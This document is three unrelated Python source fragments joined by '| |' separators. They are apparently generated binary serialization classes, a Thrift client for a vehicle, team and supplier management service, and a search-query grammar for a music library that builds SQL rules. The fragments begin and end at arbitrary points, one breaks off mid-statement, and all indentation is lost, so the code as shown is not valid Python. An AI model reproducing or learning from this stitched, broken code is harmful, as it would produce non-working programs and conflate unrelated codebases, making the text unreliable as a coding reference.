tmp2 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
if tmp2:
tmp3 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
tmp4 = s[offset:offset + tmp3]
offset += tmp3
tmp4 += b'\x00' * (4 - tmp3)
tmp5 = struct.unpack('I', tmp4)[0]
self.first_name = s[offset:offset + tmp5].decode('ISO-8859-1') if PY3 else s[offset:offset + tmp5]
offset += tmp5
else:
self.first_name = None
# deserialize self._last_name_
tmp6 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
if tmp6:
tmp7 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
tmp8 = s[offset:offset + tmp7]
offset += tmp7
tmp8 += b'\x00' * (4 - tmp7)
tmp9 = struct.unpack('I', tmp8)[0]
self._last_name_ = s[offset:offset + tmp9].decode('ISO-8859-1') if PY3 else s[offset:offset + tmp9]
offset += tmp9
else:
self._last_name_ = None
return offset
class Child(Parent):
@staticmethod
def name():
return 'Child'
def __init__(self, first_name=None, _last_name_=None, c=None):
self.initialize(first_name, _last_name_, c)
def initialize(self, first_name=None, _last_name_=None, c=None):
Parent.initialize(self, first_name, _last_name_)
self.c = c
def serialize(self):
s = b''
# serialize parents
s += Parent.serialize(self)
# serialize self.c
s += b'\x00' if self.c is None else b'\x01'
if self.c is not None:
tmp10 = b''
tmp10 += struct.pack('I', len(self.c))
while len(tmp10) and tmp10[-1] == b'\x00'[0]:
tmp10 = tmp10[:-1]
s += struct.pack('B', len(tmp10))
s += tmp10
s += self.c.encode('ISO-8859-1') if PY3 else self.c
return s
def deserialize(self, s, offset=0):
# deserialize parents
offset = Parent.deserialize(self, s, offset)
# deserialize self.c
tmp11 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
if tmp11:
tmp12 = struct.unpack('B', s[offset:offset + 1])[0]
offset += 1
tmp13 = s[offset:offset + tmp12]
offset += tmp12
tmp13 += b'\x00' * (4 - tmp12)
tmp14 = struct.unpack('I', tmp13)[0]
self.c = s[offset:offset + tmp14].decode('ISO-8859-1') if PY3 else s[offset:offset + tmp14]
offset += tmp14
else:
self.c = None
return offset
class Test(object):
@staticmethod
def name():
return 'Test'
def __init__(self, v0=None, v1=None, v2=None, v3=None, v4=None, v5=None, v6=None, v7=None, v8=None, v9=None, v10=None, v11=None, v12=None, v13=None, v14=None, v15=None, v16=None, v17=None, v18=None, v19=None, v20=None, v21=None, v22=None, v23=None):
self.initialize(v0, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23)
def initialize(self, v0=None, v1=None, v2=None, v3=None, v4=None, v5=None, v6=None, v7=None, v8=None, v9=None, v10=None, v11=None, v12=None, v13=None, v14=None, v15=None, v16=None, v17=None, v18=None, v19=None, v20=None, v21=None, v22=None, v23=None):
self.v0 = v0
self.v1 = v1
self.v2 = v2
self.v3 = v3
self.v4 = v4
self.v5 = v5
self.v6 = v6
self.v7 = v7
self.v8 = v8
self.v9 = v9
self.v10 = v10
self.v11 = v11
self.v12 = v12
self.v13 = v13
self.v14 = v14
self.v15 = v15
self.v16 = v16
self.v17 = v17
self.v18 = v18
self.v19 = v19
self.v20 = v20
self.v21 = v21
self.v22 = v22
self.v23 = v23
def serialize(self):
s = b''
# serialize self.v0
s += b'\x00' if self.v0 is None else b'\x01'
if self.v0 is not None:
s += struct.pack('?', self.v0)
# serialize self.v1
s += b'\x00' if self.v1 is None else b'\x01'
if self.v1 is not None:
s += struct.pack('c', self.v1.encode('ISO-8859-1') if PY3 else self.v1)
# serialize self.v2
s += b'\x00' if self.v2 is None else b'\x01'
if self.v2 is not None:
s += struct.pack('b', self.v2)
# serialize self.v3
s += b'\x00' if self.v3 is None else b'\x01'
if self.v3 is not None:
s += struct.pack('B', self.v3)
# serialize self.v4
s += b'\x00' if self.v4 is None else b'\x01'
if self.v4 is not None:
s += struct.pack('h', self.v4)
# serialize self.v5
s += b'\x00' if self.v5 is None else b'\x01'
if self.v5 is not None:
s += struct.pack('H', self.v5)
# serialize self.v6
s += b'\x00' if self.v6 is None else b'\x01'
if self.v6 is not None:
s += struct.pack('i', self.v6)
# serialize self.v7
s += b'\x00' if self.v7 is None else b'\x01'
if self.v7 is not None:
s += struct.pack('I', self.v7)
# serialize self.v8
s += b'\x00' if self.v8 is None else b'\x01'
if self.v8 is not None:
s += struct.pack('q', self.v8)
# serialize self.v9
s += b'\x00' if self.v9 is None else b'\x01'
if self.v9 is not None:
s += struct.pack('Q', self.v9)
# serialize self.v10
s += b'\x00' if self.v10 is None else b'\x01'
if self.v10 is not None:
s += struct.pack('f', self.v10)
# serialize self.v11
s += b'\x00' if self.v11 is None else b'\x01'
if self.v11 is not None:
s += struct.pack('d', self.v11)
# serialize self.v12
s += b'\x00' if self.v12 is None else b'\x01'
if self.v12 is not None:
tmp15 = b''
tmp15 += struct.pack('I', len(self.v12))
while len(tmp15) and tmp15[-1] == b'\x00'[0]:
tmp15 = tmp15[:-1]
s += struct.pack('B', len(tmp15))
s += tmp15
s += self.v12.encode('ISO-8859-1') if PY3 else self.v12
# serialize self.v13
s += b'\x00' if self.v13 is None else b'\x01'
if self.v13 is not None:
s += struct.pack('b', self.v13.value)
# serialize self.v14
s += b'\x00' if self.v14 is None else b'\x01'
if self.v14 is not None:
s += self.v14.serialize()
# serialize self.v15
s += b'\x00' if self.v15 is None else b'\x01'
if self.v15 is not None:
tmp16 = b''
tmp16 += struct.pack('I', len(self.v15))
while len(tmp16) and tmp16[-1] == b'\x00'[0]:
tmp16 = tmp16[:-1]
s += struct.pack('B', len(tmp16))
s += tmp16
for tmp17 in self.v15:
s += b'\x00' if tmp17 is None else b'\x01'
if tmp17 is not None:
s += struct.pack('i', tmp17)
# serialize self.v16
s += b'\x00' if self.v16 is None else b'\x01'
if self.v16 is not None:
tmp18 = b''
tmp18 += struct.pack('I', len(self.v16))
while len(tmp18) and tmp18[-1] == b'\x00'[0]:
tmp18 = tmp18[:-1]
s += struct.pack('B', len(tmp18))
s += tmp18
for tmp19 in self.v16:
s += b'\x00' if tmp19 is None else b'\x01'
if tmp19 is not None:
tmp20 = b''
tmp20 += struct.pack('I', len(tmp19))
while len(tmp20) and tmp20[-1] == b'\x00'[0]:
tmp20 = tmp20[:-1]
s += struct.pack('B', len(tmp20))
s += tmp20
for tmp21 in tmp19:
s += b'\x00' if tmp21 is None else b'\x01'
if tmp21 is not None:
s += struct.pack('c', tmp21.encode('ISO-8859-1') if PY3 else tmp21)
# serialize self.v17
s += b'\x00' if self.v17 is None else b'\x01'
if self.v17 is not None:
tmp22 = b''
tmp22 += struct.pack('I', len(self.v17))
while len(tmp22) and tmp22[-1] == b'\x00'[0]:
tmp22 = tmp22[:-1]
s += struct.pack('B', len(tmp22))
s += tmp22
for tmp23 in self.v17:
s += b'\x00' if tmp23 is None else b'\x01'
if tmp23 is not None:
tmp24 = b''
tmp24 += struct.pack('I', len(tmp23))
while len(tmp24) and tmp24[-1] == b'\x00'[0]:
tmp24 = tmp24[:-1]
s += struct.pack('B', len(tmp24))
s += tmp24
s += tmp23.encode('ISO-8859-1') if PY3 else tmp23
s += b'\x00' if self.v17[tmp23] is None else b'\x01'
if self.v17[tmp23] is not None:
s += struct.pack('i', self.v17[tmp23])
# serialize self.v18
s += b'\x00' if self.v18 is None else b'\x01'
if self.v18 is not None:
tmp25 = b''
tmp25 += struct.pack('I', len(self.v18))
while len(tmp25) and tmp25[-1] == b'\x00'[0]:
tmp25 = tmp25[:-1]
s += struct.pack('B', len(tmp25))
s += tmp25
for tmp26 in self.v18:
s += b'\x00' if tmp26 is None else b'\x01'
if tmp26 is not None:
s += struct.pack('c', tmp26.encode('ISO-8859-1') if PY3 else tmp26)
s += b'\x00' if self.v18[tmp26] is None else b'\x01'
if self.v18[tmp26] is not None:
tmp27 = b''
tmp27 += struct.pack('I', len(self.v18[tmp26]))
while len(tmp27) and tmp27[-1] == b'\x00'[0]:
tmp27 = tmp27[:-1]
s += struct.pack('B', len(tmp27))
s += tmp27
for tmp28 in self.v18[tmp26]:
s += b'\x00' if tmp28 is None else b'\x01'
if tmp28 is not None:
tmp29 = b''
tmp29 += struct.pack('I', len(tmp28))
while len(tmp29) and tmp29[-1] == b'\x00'[0]:
tmp29 = tmp29[:-1]
s += struct.pack('B', len(tmp29))
s += tmp29
for tmp30 in tmp28:
s += b'\x00' if tmp30 is None else b'\x01'
if tmp30 is not None:
s += struct.pack('d', tmp30)
s += b'\x00' if tmp28[tmp30] is None else b'\x01'
if tmp28[tmp30] is not None:
s += struct.pack('b', tmp28[tmp30].value)
# serialize self.v19
s += b'\x00' if self.v19 is None else b'\x01'
if self.v19 is not None:
for tmp31 in range(10):
s += b'\x00' if self.v19[tmp31] is None else b'\x01'
if self.v19[tmp31] is not None:
s += struct.pack('b', self.v19[tmp31])
# serialize self.v20
s += b'\x00' if self.v20 is None else b'\x01'
if self.v20 is not None:
for tmp32 in range(10):
for tmp33 in range(20):
s += b'\x00' if self.v20[tmp32][tmp33] is None else b'\x01'
if self.v20[tmp32][tmp33] is not None:
tmp34 = b''
tmp34 += struct.pack('I', len(self.v20[tmp32][tmp33]))
while len(tmp34) and tmp34[-1] == b'\x00'[0]:
tmp34 = tmp34[:-1]
s += struct.pack('B', len(tmp34))
s += tmp34
for tmp35 in self.v20[tmp32][tmp33]:
s += b'\x00' if tmp35 is None else b'\x01'
if tmp35 is not None:
tmp36 = b''
tmp36 += struct.pack('I', len(tmp35))
while len(tmp36) and tmp36[-1] == b'\x00'[0]:
tmp36 = tmp36[:-1]
s += struct.pack('B', len(tmp36))
s += tmp36
s += tmp35.encode('ISO-8859-1') if PY3 else tmp35
# serialize self.v21
s += b'\x00' if self.v21 is None else b'\x01'
if self.v21 is not None:
tmp37 = b''
tmp37 += struct.pack('I', len(self.v21))
while len(tmp37) and tmp37[-1] == b'\x00'[0]:
tmp37 = tmp37[:-1]
s += struct.pack('B', len(tmp37))
s += tmp37
for tmp38 in self.v21:
s += b'\x00' if tmp38 is None else b'\x01'
if tmp38 is not None:
for tmp39 in range(4):
s += b'\x00' if tmp38[tmp39] is None else b'\x01'
if tmp38[tmp39] | |
args.ssid = ssid
args.anchor = anchor
args.status = status
args.enter_date = enter_date
args.stuff_name = stuff_name
args.supplier_name = supplier_name
args.vichele_number = vichele_number
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_company_vichele_info(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_company_vichele_info_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_company_vichele_info failed: unknown result")
def confirm_vichele(self, ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name):
"""
Parameters:
- ssid
- info
- company_for_select
- all_select
- enter_date
- stuff_name
- supplier_name
"""
self.send_confirm_vichele(ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name)
return self.recv_confirm_vichele()
def send_confirm_vichele(self, ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name):
self._oprot.writeMessageBegin('confirm_vichele', TMessageType.CALL, self._seqid)
args = confirm_vichele_args()
args.ssid = ssid
args.info = info
args.company_for_select = company_for_select
args.all_select = all_select
args.enter_date = enter_date
args.stuff_name = stuff_name
args.supplier_name = supplier_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_confirm_vichele(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = confirm_vichele_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "confirm_vichele failed: unknown result")
def cancel_vichele(self, ssid, info, all_select, enter_date, stuff_name, supplier_name):
"""
Parameters:
- ssid
- info
- all_select
- enter_date
- stuff_name
- supplier_name
"""
self.send_cancel_vichele(ssid, info, all_select, enter_date, stuff_name, supplier_name)
return self.recv_cancel_vichele()
def send_cancel_vichele(self, ssid, info, all_select, enter_date, stuff_name, supplier_name):
self._oprot.writeMessageBegin('cancel_vichele', TMessageType.CALL, self._seqid)
args = cancel_vichele_args()
args.ssid = ssid
args.info = info
args.all_select = all_select
args.enter_date = enter_date
args.stuff_name = stuff_name
args.supplier_name = supplier_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_cancel_vichele(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = cancel_vichele_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "cancel_vichele failed: unknown result")
def create_vichele_team(self, open_id, team_info):
"""
Parameters:
- open_id
- team_info
"""
self.send_create_vichele_team(open_id, team_info)
return self.recv_create_vichele_team()
def send_create_vichele_team(self, open_id, team_info):
self._oprot.writeMessageBegin('create_vichele_team', TMessageType.CALL, self._seqid)
args = create_vichele_team_args()
args.open_id = open_id
args.team_info = team_info
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_vichele_team(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = create_vichele_team_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "create_vichele_team failed: unknown result")
def update_vichele_team(self, open_id, team_info):
"""
Parameters:
- open_id
- team_info
"""
self.send_update_vichele_team(open_id, team_info)
return self.recv_update_vichele_team()
def send_update_vichele_team(self, open_id, team_info):
self._oprot.writeMessageBegin('update_vichele_team', TMessageType.CALL, self._seqid)
args = update_vichele_team_args()
args.open_id = open_id
args.team_info = team_info
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_update_vichele_team(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = update_vichele_team_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "update_vichele_team failed: unknown result")
def del_vichele_team(self, open_id, team_id):
"""
Parameters:
- open_id
- team_id
"""
self.send_del_vichele_team(open_id, team_id)
return self.recv_del_vichele_team()
def send_del_vichele_team(self, open_id, team_id):
self._oprot.writeMessageBegin('del_vichele_team', TMessageType.CALL, self._seqid)
args = del_vichele_team_args()
args.open_id = open_id
args.team_id = team_id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_del_vichele_team(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = del_vichele_team_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "del_vichele_team failed: unknown result")
def get_all_vichele_team(self, open_id):
"""
Parameters:
- open_id
"""
self.send_get_all_vichele_team(open_id)
return self.recv_get_all_vichele_team()
def send_get_all_vichele_team(self, open_id):
self._oprot.writeMessageBegin('get_all_vichele_team', TMessageType.CALL, self._seqid)
args = get_all_vichele_team_args()
args.open_id = open_id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_all_vichele_team(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_all_vichele_team_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_all_vichele_team failed: unknown result")
def get_vichele_team(self, open_id, team_id):
"""
Parameters:
- open_id
- team_id
"""
self.send_get_vichele_team(open_id, team_id)
return self.recv_get_vichele_team()
def send_get_vichele_team(self, open_id, team_id):
self._oprot.writeMessageBegin('get_vichele_team', TMessageType.CALL, self._seqid)
args = get_vichele_team_args()
args.open_id = open_id
args.team_id = team_id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_vichele_team(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_vichele_team_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_vichele_team failed: unknown result")
def change_company_name(self, ssid, vichele_id, company_name):
"""
Parameters:
- ssid
- vichele_id
- company_name
"""
self.send_change_company_name(ssid, vichele_id, company_name)
return self.recv_change_company_name()
def send_change_company_name(self, ssid, vichele_id, company_name):
self._oprot.writeMessageBegin('change_company_name', TMessageType.CALL, self._seqid)
args = change_company_name_args()
args.ssid = ssid
args.vichele_id = vichele_id
args.company_name = company_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_change_company_name(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = change_company_name_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "change_company_name failed: unknown result")
def fill_company_name(self, open_id, vichele_id, company_name):
"""
Parameters:
- open_id
- vichele_id
- company_name
"""
self.send_fill_company_name(open_id, vichele_id, company_name)
return self.recv_fill_company_name()
def send_fill_company_name(self, open_id, vichele_id, company_name):
self._oprot.writeMessageBegin('fill_company_name', TMessageType.CALL, self._seqid)
args = fill_company_name_args()
args.open_id = open_id
args.vichele_id = vichele_id
args.company_name = company_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_fill_company_name(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = fill_company_name_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "fill_company_name failed: unknown result")
def company_history(self, ssid):
"""
Parameters:
- ssid
"""
self.send_company_history(ssid)
return self.recv_company_history()
def send_company_history(self, ssid):
self._oprot.writeMessageBegin('company_history', TMessageType.CALL, self._seqid)
args = company_history_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_company_history(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = company_history_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "company_history failed: unknown result")
def add_supplier(self, ssid, supplier_info):
"""
Parameters:
- ssid
- supplier_info
"""
self.send_add_supplier(ssid, supplier_info)
return self.recv_add_supplier()
def send_add_supplier(self, ssid, supplier_info):
self._oprot.writeMessageBegin('add_supplier', TMessageType.CALL, self._seqid)
args = add_supplier_args()
args.ssid = ssid
args.supplier_info = supplier_info
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_add_supplier(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = add_supplier_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "add_supplier failed: unknown result")
def update_supplier(self, ssid, supplier_info):
"""
Parameters:
- ssid
- supplier_info
"""
self.send_update_supplier(ssid, supplier_info)
return self.recv_update_supplier()
def send_update_supplier(self, ssid, supplier_info):
self._oprot.writeMessageBegin('update_supplier', TMessageType.CALL, self._seqid)
args = update_supplier_args()
args.ssid = ssid
args.supplier_info = supplier_info
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_update_supplier(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = update_supplier_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "update_supplier failed: unknown result")
def del_supplier(self, ssid, supplier_id):
"""
Parameters:
- ssid
- supplier_id
"""
self.send_del_supplier(ssid, supplier_id)
return self.recv_del_supplier()
def send_del_supplier(self, ssid, supplier_id):
self._oprot.writeMessageBegin('del_supplier', TMessageType.CALL, self._seqid)
args = del_supplier_args()
args.ssid = ssid
args.supplier_id = supplier_id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_del_supplier(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = del_supplier_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "del_supplier failed: unknown result")
def get_all_supplier(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_all_supplier(ssid)
return self.recv_get_all_supplier()
def send_get_all_supplier(self, ssid):
self._oprot.writeMessageBegin('get_all_supplier', TMessageType.CALL, self._seqid)
args = get_all_supplier_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_all_supplier(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_all_supplier_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_all_supplier failed: unknown result")
def smart_assign(self, ssid, vichele_info):
"""
Parameters:
- ssid
- vichele_info
"""
self.send_smart_assign(ssid, vichele_info)
return self.recv_smart_assign()
def send_smart_assign(self, ssid, vichele_info):
self._oprot.writeMessageBegin('smart_assign', TMessageType.CALL, self._seqid)
args = smart_assign_args()
args.ssid | |
continue
elif tok not in self.operators_flow:
tokens[i] = self.buildRule(current_col,current_opr,tok)
i+=1
# return the single rule of a meta rule of all rules
if len(tokens) == 1:
return tokens[0]
return self.operators_flow_join( tokens )
def addMeta(self, colid, tok, value, top):
""" meta options control sql parameters of the query
They are independant of any database.
"""
if not top:
raise ParseError("Option `%s` at position %d can only be provided at the top level."%(colid,colid.pos))
if colid in self.meta_options:
raise ParseError("Option `%s` at position %d can not be provided twice"%(colid,colid.pos))
if tok not in self.operators:
raise ParseError("Operator `%s` at position %d not valid in this context"%(tok,tok.pos))
rule = self.operators[tok]
if colid == Grammar.META_DEBUG:
self.meta_options[colid] = int(value)
elif colid in (Grammar.META_LIMIT,Grammar.META_OFFSET):
if rule in (PartialStringSearchRule, ExactSearchRule):
self.meta_options[colid] = int(value)
else:
raise ParseError("Illegal operation `%s` at position %d for option `%s`"%(tok,tok.pos,colid))
# protected
def compile_operators(self):
raise NotImplementedError()
def buildRule(self, colid, rule ,value):
raise NotImplementedError()
class SearchGrammar(Grammar):
def __init__(self):
super(SearchGrammar, self).__init__()
def compile_operators(self):
self.all_text = 'text'
# sigil is used to define the oldstyle syntax marker
# it should not appear in tok_special
self.sigil = '.'
# tokens control how the grammar is parsed.
self.tok_whitespace = " \t" # token separators
# all meaningful non-text chars
self.tok_operators = '~!=<>'
self.tok_flow = "|&"
self.tok_special = self.tok_operators + self.tok_flow
self.tok_negate = "!"
self.tok_nest_begin = '('
self.tok_nest_end = ')'
self.tok_quote = "\""
self.tok_escape = "\\"
# does not require left token
self.operators = {
"=" :PartialStringSearchRule,
"~" :PartialStringSearchRule,
"==":ExactSearchRule,
"=~":RegExpSearchRule,
"!=":InvertedPartialStringSearchRule,
"!==":InvertedExactSearchRule,
}
self.operators_invert = {
InvertedPartialStringSearchRule :PartialStringSearchRule,
InvertedExactSearchRule:ExactSearchRule,
PartialStringSearchRule:InvertedPartialStringSearchRule,
ExactSearchRule:InvertedExactSearchRule,
}
# require left/right token
self.special = {
"<" : LessThanSearchRule,
">" : GreaterThanSearchRule,
"<=" : LessThanEqualSearchRule,
">=" : GreaterThanEqualSearchRule,
}
self.special_invert = {
GreaterThanSearchRule : LessThanSearchRule,
LessThanSearchRule : GreaterThanSearchRule,
GreaterThanEqualSearchRule : LessThanEqualSearchRule,
LessThanEqualSearchRule : GreaterThanEqualSearchRule,
}
# meta optins can be used to control the query results
# by default, limit could be used to limit the number of results
self.meta_columns = set([Grammar.META_LIMIT,Grammar.META_OFFSET,Grammar.META_DEBUG])
self.meta_options = dict()
self.old_style_operators = self.operators.copy()
self.old_style_operators.update(self.special)
self.old_style_operators_invert = self.operators_invert.copy()
self.old_style_operators_invert.update(self.special_invert)
self.operators_flow = {
"&&" : AndSearchRule,
"||" : OrSearchRule,
"!" : NotSearchRule,
}
self.operators_flow_invert = { v:k for k,v in self.operators_flow.items() }
self.operators_flow_join = AndSearchRule
def buildRule(self, colid, rule ,value):
"""
this must be expanded to support new data formats.
"""
col = self.translateColumn( colid )
if col == self.all_text:
return self.allTextRule(rule, value)
elif col in self.text_fields:
return rule( col, value )
elif col in self.date_fields:
return self.buildDateRule(col, rule, value)
# numeric field
# partial rules don't make sense, convert to exact rules
if col in self.time_fields:
value = self.fc.parseDuration( value )
if col in self.year_fields:
value = self.fc.parseYear( value )
type_ = str
if col not in self.text_fields:
type_ = int
if rule is PartialStringSearchRule:
return ExactSearchRule(col, value, type_=type_)
if rule is InvertedPartialStringSearchRule:
return InvertedExactSearchRule(col, value, type_=type_)
return rule( col, value, type_=type_)
def buildDateRule( self, col, rule, value):
"""
There are two date fields, 'last_played' and 'date_added'
queries can be run in two modes.
providing an integer (e.g. date < N) performs a relative search
from the current date, in this examples songs played since N days ago.
providing a date string will run an exact search. (e.g. date < 15/3/12)
the string is parsed y/m/d but otherwise behaves exactly the same way.
< : closer to present day, including the date given
> : farther into the past, excluding the given date
= : exactly that day, from 00:00:00 to 23:59:59
"""
c = value.count('/')
invert = False
try:
if c > 0:
# if there are any slashes assume the user wants to
# parse the string as some form of YYYY/MM/DD
epochtime,epochtime2 = self.fc.formatDate( value )
elif c > 2:
# the user gave two many separators for the date to make sense
# TODO: create a special format for YY/MM/DD since that it can
# be modified for other orders
raise ParseError("Invalid Date format `%s` at position %d. Expected YY/MM/DD."%(value,value.pos))
else:
# parse the bare integer as a day-delta
epochtime,epochtime2 = self.fc.formatDateDelta( value )
invert = True
except ValueError as e:
# something went wrong trying to parse the date, try parsing
# it as a natural string instead
result = self.fc.parseNLPDate( value )
if result is None:
# failed to convert istr -> int
raise ParseError("Expected Integer or Date, found `%s` at position %d"%(value,value.pos))
epochtime,epochtime2 = result
# flip the context of '<' and '>'
# for dates, '<' means closer to present day
# date < 5 is anything in the last 5 days
# only invert when giving a relative date range
# inverted query when giving an absolute date is confusing
if invert and rule in self.special_invert:
rule = self.special_invert[rule]
# token '=' is partial string matching, in the context of dates
# it will return any song played exactly n days ago
# a value of '1' is yesterday
if rule is PartialStringSearchRule:
return RangeSearchRule(col, IntDate(epochtime), IntDate(epochtime2), type_=int)
# inverted range matching
if rule is InvertedPartialStringSearchRule:
return NotRangeSearchRule(col, IntDate(epochtime), IntDate(epochtime2), type_=int)
# todo: this needs further testing due to recent change
# if invert is true, use less than equal
# if invert is false, use greater than equal (i believe this is needed)
if invert and rule is LessThanEqualSearchRule:
return rule( col, IntDate(epochtime2), type_=int)
return rule( col, IntDate(epochtime), type_=int)
def allTextRule(self, rule, string ):
"""
returns a rule that will return true if
any text field matches the given string
or if no text field contains the string
"""
return MultiColumnSearchRule(rule, self.text_fields, string, colid=self.all_text)
class UpdateRule(Rule):
"""Baseclass for update rules
The check()/sql() methods are a form of self documentation and ard
database implementation dependent. For example the check method
for the RangeSearchRule rule is implemented to match the BETWEEN condition
in sqlite3.
"""
def __init__(self):
super(UpdateRule, self).__init__()
def sqlstr(self):
""" like sql() but returns a single string representing the rule"""
s,v = self.sql()
return s.replace("?","{}").format(*map(self.fmtval,v))
class ColumnUpdateRule(UpdateRule):
"""Base class for applying a rule to a column in a table"""
def __init__(self, column, value):
super(ColumnUpdateRule, self).__init__()
self.column = column
self.value = value
